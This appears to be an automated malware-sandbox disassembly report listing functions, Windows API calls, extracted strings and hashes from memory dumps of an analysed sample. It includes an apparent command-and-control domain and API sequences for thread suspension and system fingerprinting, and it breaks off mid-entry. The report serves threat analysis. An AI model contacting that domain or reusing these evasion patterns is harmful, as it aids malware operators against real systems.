Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$View$AllocCreate
String ID:
API String ID: 2664363762-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: 8e519fd7b74fe6da36657f8a91c5073c6c8c67357283567cca0370bf7ce165a7
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: CF42AB71608301AFDB25CF24C894BABBBE9FF88704F14492DF9859B651D732E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02905183 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1113COMMON

Download Yara Rule

Strings

= 'Q, xrefs: 02905EF2
cfbe, xrefs: 02905CFE

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: = 'Q$cfbe
API String ID: 0-911374196
Opcode ID: 68362fe27180c8e40d1ce42d38cfe248d452c040072189222c5384b9d5671d00
Instruction ID: 92e7f35b273cb307d9337cbf0ce440325bef0b4e8e314e9c92fba81446654db4
Opcode Fuzzy Hash: 68362fe27180c8e40d1ce42d38cfe248d452c040072189222c5384b9d5671d00
Instruction Fuzzy Hash: C5923970145B858EE726CB35C4A4BE3BBE5BF17308F84099DD4EB9B282C77AA105CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02360C99 Relevance: 7.6, APIs: 5, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,023607DF,?,00000001,?,81EC8B55,000000FF), ref: 02360CD7
Thread32First.KERNEL32(00000000,0000001C), ref: 02360D03
Wow64SuspendThread.KERNEL32(00000000), ref: 02360D56
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02360D80
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02360DB4

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1145194703-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 985d01b0eb091fedfbc8e6c4407c1c633da07c17bc52367df66e0a3125a15c01
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 76411E71600108AFDB18DF98C895BADB7BAFF88304F10C169E6159B7A4DB35AE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 028E9D20 Relevance: 6.7, Strings: 5, Instructions: 468
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

j, xrefs: 028EA02C
tQpS, xrefs: 028EA20C
0, xrefs: 028E9D96
Y!N#, xrefs: 028EA1EC
b, xrefs: 028EA166

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: 0$Y!N#$b$j$tQpS
API String ID: 0-1561506603
Opcode ID: de5eafab4bdf18e2b36e5adc21418a04dbaa748fcf2d2b5af97e8c895885e398
Instruction ID: 8ea4d3ef1eb4f34792fcfdc36b520b0a82721629f3d9e6c5e94f21e3974da0d9
Opcode Fuzzy Hash: de5eafab4bdf18e2b36e5adc21418a04dbaa748fcf2d2b5af97e8c895885e398
Instruction Fuzzy Hash: 821222B42083819BE724CF15C4A4B6FBBE2BBC2708F445D1DE4D68B291D779D809CB92

Uniqueness

Uniqueness Score: -1.00%

Function 028E4C40 Relevance: 5.5, Strings: 4, Instructions: 498
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

IDAT, xrefs: 028E5115
IEND, xrefs: 028E5193
IHDR, xrefs: 028E50A6
), xrefs: 028E4CDC

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: )$IDAT$IEND$IHDR
API String ID: 0-3181356877
Opcode ID: a90fd7d622bdcc5a926f264278fc5d9a90699a3c9065ba64b056bee0149ee4ba
Instruction ID: 24464725855c4ec7679f48d701b1aa27b14d2e7494029070281d46d033b24641
Opcode Fuzzy Hash: a90fd7d622bdcc5a926f264278fc5d9a90699a3c9065ba64b056bee0149ee4ba
Instruction Fuzzy Hash: 54121C796083508FDB08CF29D89072A7BE1EF86304F45856DE986CF392D779D909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 029184D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 029184B5

Strings

D1B7, xrefs: 02918412
D1B7, xrefs: 0291853B

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: D1B7$D1B7
API String ID: 1029625771-2576811906
Opcode ID: f9cc780378c8e2c9fdc214b7e94cdd324c8c6ae2923c137d6e7a219c8e1c967a
Instruction ID: dd14aae950435d425856729882fc6c72881c1447adf4a27b1f2c1c8ec5cb6954
Opcode Fuzzy Hash: f9cc780378c8e2c9fdc214b7e94cdd324c8c6ae2923c137d6e7a219c8e1c967a
Instruction Fuzzy Hash: 54517AB4A0C3019BE718CF11E9A072ABBE2FBC5708F159D2CE48947340E7748919DF86

Uniqueness

Uniqueness Score: -1.00%

Function 028F5B57 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

v, xrefs: 028F60D9

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: f99a2103830a1bb29cefeca632064dd72f55e6620e370168ca101a6590bbc71a
Instruction ID: 6df993d5984e50b11067432cb5c58f476f52c1cb7dda80dc9bc63a282154f889
Opcode Fuzzy Hash: f99a2103830a1bb29cefeca632064dd72f55e6620e370168ca101a6590bbc71a
Instruction Fuzzy Hash: B2E1CFB95083419FD724CF18C49075BBBE2AFD5308F588A1DE5AA8B382E735D845CB93

Uniqueness

Uniqueness Score: -1.00%

Function 02360B49 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 02360C15

Strings

,, xrefs: 02360C61

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 6b1cf9dda66731cb16771824fca746e0a9ce67f31f190e804c4479335b560b41
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 6041E874A00209EFDB08CF98C995BAEB7B6FF88304F208198D5156B385D771AE85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02901F80 Relevance: 2.9, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

vSUN, xrefs: 029023BA
A\]D, xrefs: 02902356

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: A\]D$vSUN
API String ID: 2994545307-3118794373
Opcode ID: 029fb4ced6e0e2b5e6848447630a2a876e7ac970a08935e9104b3b1c76346c21
Instruction ID: 29d5e1a1fa6bb41b0ca9c0b59ad4b8e92030a198d5711a3243c88df411b1226a
Opcode Fuzzy Hash: 029fb4ced6e0e2b5e6848447630a2a876e7ac970a08935e9104b3b1c76346c21
Instruction Fuzzy Hash: 91C1CCB1A083458FE714CF58C4D4B2BB7E6EF89318F55892DE9899B381E374D905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 029012B0 Relevance: 2.8, Strings: 2, Instructions: 263COMMON

Download Yara Rule

Strings

EBC, xrefs: 02901339
s}, xrefs: 02901580

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: s}$EBC
API String ID: 0-541026534
Opcode ID: 0373ac547ce0b58cfd13d5553c6e62dcb0d3512eb57ef2ff761db44294f3b642
Instruction ID: 4abe904bc5f32a67d50134e8131d9b3e74e60d5a3cbe758f8936a16993203ae3
Opcode Fuzzy Hash: 0373ac547ce0b58cfd13d5553c6e62dcb0d3512eb57ef2ff761db44294f3b642
Instruction Fuzzy Hash: E59164B15083458FD724CF14C89176BBBF1FF82358F548A1CE4AA9B291E379D909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02360589 Relevance: 1.9, APIs: 1, Instructions: 399threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0236082C

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1f35b3ecb21dc8f813d6e8e7d81f9f0ef3989b4055eec88777e3e1fd98cfc0c0
Instruction ID: bb79442258ed23a6b5b27a5eb887a59a78d86997a561e2a89be9cc8b82f457b2
Opcode Fuzzy Hash: 1f35b3ecb21dc8f813d6e8e7d81f9f0ef3989b4055eec88777e3e1fd98cfc0c0
Instruction Fuzzy Hash: A112E3B4E00219DFDB18CF98C995BADBBB6FF88304F2482A9D505AB385C7356A41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02915ACB Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 02915B5D

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 61059010bc562af46293d69070e8d65ad0f2724c4b4087a2c13acb5efb02aa32
Instruction ID: eab7b128b439b9808e371d756c9db8c73b0548c029018342181b8c49e099554c
Opcode Fuzzy Hash: 61059010bc562af46293d69070e8d65ad0f2724c4b4087a2c13acb5efb02aa32
Instruction Fuzzy Hash: 9011F3B05083019FE718CF10D46476FFBE1EBC5318F218A1DE8A92B681C379D90ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 02915B70 Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0291A5F6,?,00000006,00120089,?,00000018,gxyz,?,028F518F), ref: 02915B9D

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction ID: 8786dc18422e43825a53ca1fdb9078bd7c890a6123e261c4ae3138fb1a31f5b2
Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction Fuzzy Hash: 00E0B67550920AEBDA05DF45C14051EF7E6BFC4714FA6C88DE88423204C7B4BD45DA42

Uniqueness

Uniqueness Score: -1.00%

Function 0291AE30 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0291AE98

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: 77269e327b1146ef117032878d10e74a5ecfc55d61f6840c1e3809cc847e8276
Instruction ID: 5e01f733c06baa187bbe5e2493db7254f73ce3327209ffee3c669bff5728c718
Opcode Fuzzy Hash: 77269e327b1146ef117032878d10e74a5ecfc55d61f6840c1e3809cc847e8276
Instruction Fuzzy Hash: DE81BB72A083069BD714CF15C8A0B6FB7A6FF88728F65891CE8955B290D330EC15CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0291B800 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0291B898

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: gxyz
API String ID: 2994545307-2474275795
Opcode ID: 87e1c7501c49e444c9dba1e330bce7f914686d32ed3226662472edec026116dd
Instruction ID: 9188c42408ab1d9d367ba2d66506f0c0af6c56ed42098a5b91cdfe5fc2dc4d53
Opcode Fuzzy Hash: 87e1c7501c49e444c9dba1e330bce7f914686d32ed3226662472edec026116dd
Instruction Fuzzy Hash: D381AE716083069FD714CF15D8A0B6BBBE6EFC5368F58891CE8958B291D334E946CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 028F5390 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

789:, xrefs: 028F53B8

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: 34aa1a70aca8e4af7884c5d47b8a4c96c837f11f91d4196959f2b1507ef956f2
Instruction ID: 1d8d541a0719cba2c6b1b9cbc9387f25032910c2439bc02d957574b73ca1a3c4
Opcode Fuzzy Hash: 34aa1a70aca8e4af7884c5d47b8a4c96c837f11f91d4196959f2b1507ef956f2
Instruction Fuzzy Hash: 8A2190B86556408FE768CF14D4A0A3AB7A2FF9A305FA5491CC58A47681D335A805CB45

Uniqueness

Uniqueness Score: -1.00%

Function 028F7239 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed0c87fe7d3fcacc1e149f45d2c58c8e54257444a6b76c51ea604cdf9b13049a
Instruction ID: ae2e2e8d7eb1a3ae9f86e84164e738f70563401ec93a9babc2e943912d3d7756
Opcode Fuzzy Hash: ed0c87fe7d3fcacc1e149f45d2c58c8e54257444a6b76c51ea604cdf9b13049a
Instruction Fuzzy Hash: 03C141B8910B008BE7258F24C4A4767BBF2FF85304F545E0DD6A78BAA1D774E50ACB84

Uniqueness

Uniqueness Score: -1.00%

Function 028F4F10 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54cb5dd5dd0fcd48ab24a72492a27802d376ea6492d2a81bec40712d4bc4f415
Instruction ID: 7c0adde269f3fd134284af1eae5b45e8f00d08e90da13054916ff67da6f99f5b
Opcode Fuzzy Hash: 54cb5dd5dd0fcd48ab24a72492a27802d376ea6492d2a81bec40712d4bc4f415
Instruction Fuzzy Hash: 894146BD9083089BD3209F54C880727F7E8EF91318F4A566AEB9DC7681EB75D804C792

Uniqueness

Uniqueness Score: -1.00%

Function 0290A245 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0290A384

Strings

%, xrefs: 0290A2B3
D, xrefs: 0290A293
;, xrefs: 0290A2C3
:, xrefs: 0290A283
!, xrefs: 0290A2A3
3, xrefs: 0290A273
6, xrefs: 0290A2D3

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: AllocString
String ID: !$%$3$6$:$;$D
API String ID: 2525500382-2591950249
Opcode ID: 4edbd1d77459458a0635c27864b4db30886f550f556906031a4a30cde119f894
Instruction ID: 98de657a59aa154708c350228ac35251238ceb588f5a603817a9ef296687664e
Opcode Fuzzy Hash: 4edbd1d77459458a0635c27864b4db30886f550f556906031a4a30cde119f894
Instruction Fuzzy Hash: 3641CE7010CBC18ED331CB28C89878BBBE1ABD6315F084A5DE4E98B392C775950ACB57

Uniqueness

Uniqueness Score: -1.00%

Function 028ED5D0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 399
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 028ED824
ExitProcess.KERNEL32 ref: 028ED830
ExitProcess.KERNEL32 ref: 028ED83F
ExitProcess.KERNEL32 ref: 028ED851

Strings

palmeventeryjusk.shop, xrefs: 028EDB3D

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: ExitProcess
String ID: palmeventeryjusk.shop
API String ID: 621844428-2264093211
Opcode ID: 70da1d5b3f22ae64ebf5d3cc503c658d767264b3778407eff0ab70544750210f
Instruction ID: b498542b020d9b7c6ead51c1a798e41979f3d18a72fbbef7ad011583f8159f24
Opcode Fuzzy Hash: 70da1d5b3f22ae64ebf5d3cc503c658d767264b3778407eff0ab70544750210f
Instruction Fuzzy Hash: 2C220664108BC1CED726CF2C8498752BF916B56224F1887CCD8EA4F7E7D3759406CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 029171E7 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 02917275

Strings

\^, xrefs: 029171FC
D^, xrefs: 0291720C
RN, xrefs: 029171F4

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: D^$RN$\^
API String ID: 1029625771-2908450965
Opcode ID: 7ffa8921c8ee88412e263a64a6b82492bf8137b8c1af11b6ff3ccf0cee9eff71
Instruction ID: 857e3c0ac61ad709f39eb96ac1ad74ade2e1da076853f5b964e41228fa3c42ed
Opcode Fuzzy Hash: 7ffa8921c8ee88412e263a64a6b82492bf8137b8c1af11b6ff3ccf0cee9eff71
Instruction Fuzzy Hash: DA1136B4509382ABE318CF21D5A076BBBE5AB85708F144E1CE09647680C334C949CF86

Uniqueness

Uniqueness Score: -1.00%

Function 028E9240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 028E92BA

Strings

often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 028E927D

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: ExitProcess
String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
API String ID: 621844428-3137510881
Opcode ID: b2fa11756e6d731077e6e4a516b0620548d4a4510395d652c32e7afa207b4df5
Instruction ID: 805c13a11698e5756d2aca161a9ce83c6ace3dc3dbcab063978da9b1d774708a
Opcode Fuzzy Hash: b2fa11756e6d731077e6e4a516b0620548d4a4510395d652c32e7afa207b4df5
Instruction Fuzzy Hash: 51F062BEC4C20896CF007B799A0572E7AA96F43365F000629DDF7C6144EAF19455CAA3

Uniqueness

Uniqueness Score: -1.00%

Function 029140A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 029140E2

Strings

C, xrefs: 029140A8
\, xrefs: 029140B0

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: InformationVolume
String ID: C$\
API String ID: 2039140958-514332402
Opcode ID: c839157d1b47b884ab3964cc25b19f773bd15234389b5943cdd584504902f1ca
Instruction ID: 63bbff88d1f3ccf4276206314afc3c12f8d13d45dcc00954ff537fa3bfe32a28
Opcode Fuzzy Hash: c839157d1b47b884ab3964cc25b19f773bd15234389b5943cdd584504902f1ca
Instruction Fuzzy Hash: 43E01275794301BBF72C9F10EC27F2936959741744F62481CB256A91C0C7F56A288A99

Uniqueness

Uniqueness Score: -1.00%

Function 029061A1 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

!/$*, xrefs: 029069FC

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: !/$*
API String ID: 0-545799914
Opcode ID: d8ee2aaf0b64b6c4bb0d42158b18c8a33ec94195b58f3a01c0505fa1a51f564b
Instruction ID: d104111861fe1f4bd205d8131307e2586b7e38551f5b1e3ac269f03ae6d83b95
Opcode Fuzzy Hash: d8ee2aaf0b64b6c4bb0d42158b18c8a33ec94195b58f3a01c0505fa1a51f564b
Instruction Fuzzy Hash: 50F125B0205B858EE7268F35C4A47E3BBE5BF17308F44495DD4EB8B282C77AA509CB51

Uniqueness

Uniqueness Score: -1.00%

Function 029065CC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 373COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 029066FC

Strings

!/$*, xrefs: 029069FC

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: !/$*
API String ID: 3960555810-545799914
Opcode ID: 11ded6d335a68b33dcdd5bd3a404deb1e6e0e8b0bd64348b9370e46775746b73
Instruction ID: 68e1f3ba007012fa7a204563b82a0f66400f8887b3e28d2e0eb5da59e9489b41
Opcode Fuzzy Hash: 11ded6d335a68b33dcdd5bd3a404deb1e6e0e8b0bd64348b9370e46775746b73
Instruction Fuzzy Hash: 0BD106B0205B458EE7268F35C4A47E3BBE5BF17308F44496DD4EB8B282C77AA509CB51

Uniqueness

Uniqueness Score: -1.00%

Function 029183AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 029184B5

Strings

D1B7, xrefs: 02918412

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: D1B7
API String ID: 1029625771-1785272153
Opcode ID: e06d1d598fd01f2875cf2d42d70464bf862579922b63d2a5ef42bc8b32052b47
Instruction ID: 6d28e997e7058ba06fe3f6287481aaf664fc1840fbee6a590a55f39ef419ec61
Opcode Fuzzy Hash: e06d1d598fd01f2875cf2d42d70464bf862579922b63d2a5ef42bc8b32052b47
Instruction Fuzzy Hash: 2F216BB4A483019BE718CF11E9A172A7BE6FBC5308F258D1CE48947384D7758919DF82

Uniqueness

Uniqueness Score: -1.00%

Function 023B01FD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(00000000,?,?), ref: 023B028F

Strings

.dll, xrefs: 023B0234

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: cf8781a5db47fd2b27bb0886a60b0132bfd54284ec870d020e22ad0ccd069f4b
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: 7921B735A106859FDB2ACFA8D884BBB7BA4AF05224F18416DDA459FE41D730E8498790

Uniqueness

Uniqueness Score: -1.00%

Function 0291890C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 0291894D

Strings

&QPS, xrefs: 02918940

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: AllocateHeap
String ID: &QPS
API String ID: 1279760036-2176464483
Opcode ID: 94fb60559bcb901c337a85898157d973439ac52641f1c233a5f8103622bb7bde
Instruction ID: 9c42aab0519d44f8f551e1fd6a8379fe0d3e740f8fd22cd8385236b98cbce7c3
Opcode Fuzzy Hash: 94fb60559bcb901c337a85898157d973439ac52641f1c233a5f8103622bb7bde
Instruction Fuzzy Hash: 3D215B746082009FE718CF15D4A4B2BBBE2FB85324F609A1DE8A6877C5C735D865CB82

Uniqueness

Uniqueness Score: -1.00%

Function 029159F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,028E9E11), ref: 02915A87

Strings

&QPS, xrefs: 02915A48

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: AllocateHeap
String ID: &QPS
API String ID: 1279760036-2176464483
Opcode ID: 7f138b78bab0e1cdfab460c5b3f4239ec021303da84aa95f26c5efd6dc8e8cf2
Instruction ID: cb965e57b82a706fd476901532d5c0cade98c7557abe3b3b9e4d9b946560d1a5
Opcode Fuzzy Hash: 7f138b78bab0e1cdfab460c5b3f4239ec021303da84aa95f26c5efd6dc8e8cf2
Instruction Fuzzy Hash: B71118705083419FD708CF14D4A476FBBE1FBC5328F548A1DE8A507681D775D9198BC2

Uniqueness

Uniqueness Score: -1.00%

Function 023AEE4F Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON

Download Yara Rule

APIs

